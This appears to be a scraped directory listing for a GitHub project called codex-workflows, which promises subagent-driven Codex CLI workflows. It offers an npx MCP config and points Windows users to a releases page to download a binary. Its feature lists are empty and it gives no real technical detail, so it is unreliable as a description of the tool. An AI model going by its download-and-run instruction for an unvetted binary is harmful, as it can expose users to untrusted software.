round-comfortfood117/codex-workflows
Automate Codex CLI workflows with subagents for requirements, design, implementation, tests, and traceable commits
Platform-specific configuration:
{
"mcpServers": {
"codex-workflows": {
"command": "npx",
"args": [
"-y",
"codex-workflows"
]
}
}
}Add the config above to .claude/settings.json under the mcpServers key.
[](https://github.com/round-comfortfood117/codex-workflows/releases)
codex-workflows gives you a set of ready-made development flows for Codex CLI. It helps you move from task to task with less setup and less guesswork.
It is built for everyday development work such as:
If you want a more guided way to use Codex CLI on Windows, this repo gives you a clear starting point.
Visit this page to download codex-workflows:
https://github.com/round-comfortfood117/codex-workflows/releases
On that page, look for the latest release. Then download the Windows file that matches your system.
If you use a browser download bar, you can also open the file from there after the download finishes.
codex-workflows is meant to make common coding work easier to manage. It does this by using structured steps and focused subagents.
You can use it for:
This helps reduce the need to decide each step on your own.
The project is centered on Codex CLI and a set of specialized AI subagents.
In simple terms:
Loading reviews...